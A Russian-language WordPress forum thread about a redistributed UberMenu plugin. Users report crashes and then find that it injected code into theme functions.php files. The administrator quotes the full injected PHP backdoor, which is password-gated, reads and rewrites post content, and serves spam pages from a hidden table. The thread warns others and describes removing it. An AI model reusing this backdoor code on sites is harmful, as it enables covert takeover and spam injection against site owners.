• ДОБРО ПОЖАЛОВАТЬ В КЛУБ ПО WORDPRESS

    Мы активно растущий клуб по WordPress и нам нужна помощь каждого человека, в том числе и Ваша! Не стесняйтесь и станьте частью большого сообщества.
    Мы делимся новостями, отытом и полезными советами! Пройдите простую регистрацию, чтобы пользоваться всеми возможностями нашего клуба.

    Присоединяйтесь к нам, вам обязательно понравится - Присоединится
UberMenu - WordPress Mega Menu Plugin

ThaiAle

ПРОВЕРЕННЫЙ

ThaiAle

ПРОВЕРЕННЫЙ
Сообщения
13
Пользователь ThaiAle разместил новый ресурс:

UberMenu - WordPress Mega Menu Plugin v3.1.1 - Плагин для создания мега меню

Плагин позволяет легко создавать мега красивые менюшки в пару кликов, огромный функционал, смотрите демо с работай плагина.
Узнать больше об этом ресурсе...
 

den

МЕСТНЫЙ

den

МЕСТНЫЙ
Сообщения
217
Как подключить дополнительные 500 иконок в настройках?
 

Antivirus

СВОЙ МОДЕРАТОР

Antivirus

СВОЙ МОДЕРАТОР
Сообщения
403
Скачал, залил, при попытке активировать белый экран и никуда больше не впускает, ни в админку, ни в лицевую часть - везде так же белый экран. Не помогло ни удаление папки через FTP ни переименование папки plugins. Пришлось откатываться из бэкапа.. (
 

Antivirus

СВОЙ МОДЕРАТОР

Antivirus

СВОЙ МОДЕРАТОР
Сообщения
403
UPD: После отката повторил, но уже со стандартным шаблоном. UberMenu скачал ту же версию, но уже на другом сайте. После попытки активировать его все повторилось - белый экран смерти. Включил режим отладки WP - define('WP_DEBUG', true); и увидел что движок ругается на строчку *.ru/wp-content/themes/demo/functions.php on line 60
Зашел в эту папку и вижу что вышеуказанный файл был изменен несколько минут назад, причем у всех залитых тем! А строчка номер 60 содержала это:

PHP:
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
 

Попай

АДМИНИСТРАТОР

Попай

АДМИНИСТРАТОР
Сообщения
3,211
У меня плагин этой версии нормально работает и на разных хостингах пробовал никогда белого экрана не было. А вот в functions.php и правда появилось только там больше кода:
PHP:
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'b5f8b5032e51324610b56986f5234c8cfa5e68'))
    {
        switch ($_REQUEST['action'])
            {
                case 'get_all_links';
                    foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
                        {
                            $data['code'] = '';
                          
                            if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                                {
                                    $data['code'] = $_[1];
                                }
                          
                            print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
                        }
                break;
              
                case 'set_id_links';
                    if (isset($_REQUEST['data']))
                        {
                            $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');
                          
                            $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                            if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                            if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                                {
                                    print "true";
                                }
                        }
                break;
              
                case 'create_page';
                    if (isset($_REQUEST['remove_page']))
                        {
                            if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                                {
                                    print "true";
                                }
                        }
                    elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
                        {
                            if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                                {
                                    print "true";
                                }
                        }
                break;
              
                default: print "ERROR_WP_ACTION WP_URL_CD";
            }
          
        die("");
    }

  
if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
    {
        $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
        if ($data -> full_content)
            {
                print stripslashes($data -> content);
            }
        else
            {
                print '<!DOCTYPE html>';
                print '<html ';
                language_attributes();
                print ' class="no-js">';
                print '<head>';
                print '<title>'.stripslashes($data -> title).'</title>';
                print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
                print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
                print '<meta name="robots" content="index, follow" />';
                print '<meta charset="';
                bloginfo( 'charset' );
                print '" />';
                print '<meta name="viewport" content="width=device-width">';
                print '<link rel="profile" href="http://gmpg.org/xfn/11">';
                print '<link rel="pingback" href="';
                bloginfo( 'pingback_url' );
                print '">';
                wp_head();
                print '</head>';
                print '<body>';
                print '<div id="content" class="site-content">';
                print stripslashes($data -> content);
                get_search_form();
                get_sidebar();
                get_footer();
            }
          
        exit;
    }


?>
Больно похоже на черную дверь для сайта сделанную автором или другими нехорошими людьми.

Удалил этот код, сайт работает.
 

alexk

СВОЙ

alexk

СВОЙ
Сообщения
24
Здравствуйте.
Не удаётся установить плагин. Выдаёт вот такую ошибку:
Архив не удалось установить. PCLZIP_ERR_BAD_FORMAT (-10) : Unable to find End of Central Dir Record signature
 

Mvuser

СВОЙ МОДЕРАТОР

Mvuser

СВОЙ МОДЕРАТОР
Сообщения
2,174
Mvuser обновил(а) ресурс UberMenu - WordPress Mega Menu Plugin новой записью:

Обновление UberMenu - WordPress Mega Menu Plugin

* Добавление: блок UberMenu Gutenberg
* Добавление : шорткод для информации о корзине WooCommerce * Улучшение: добавлены числовые значения веса шрифта для элементов управления
настройщика * Улучшение: Предыдущая версия была уже совместима с PHP 7.2, но это удаляет ложные предупреждения о тревоге в «средствах проверки совместимости»
* Улучшение: улучшена поддержка RTL в строках
* Улучшение: добавлена константа переопределения динамического элемента верхнего уровня
* Улучшение: Обновлен...
Узнать больше об этом обновлении...
 

Попай

АДМИНИСТРАТОР

Попай

АДМИНИСТРАТОР
Сообщения
3,211

Mvuser

СВОЙ МОДЕРАТОР

Mvuser

СВОЙ МОДЕРАТОР
Сообщения
2,174

Топ поддержки


Сверху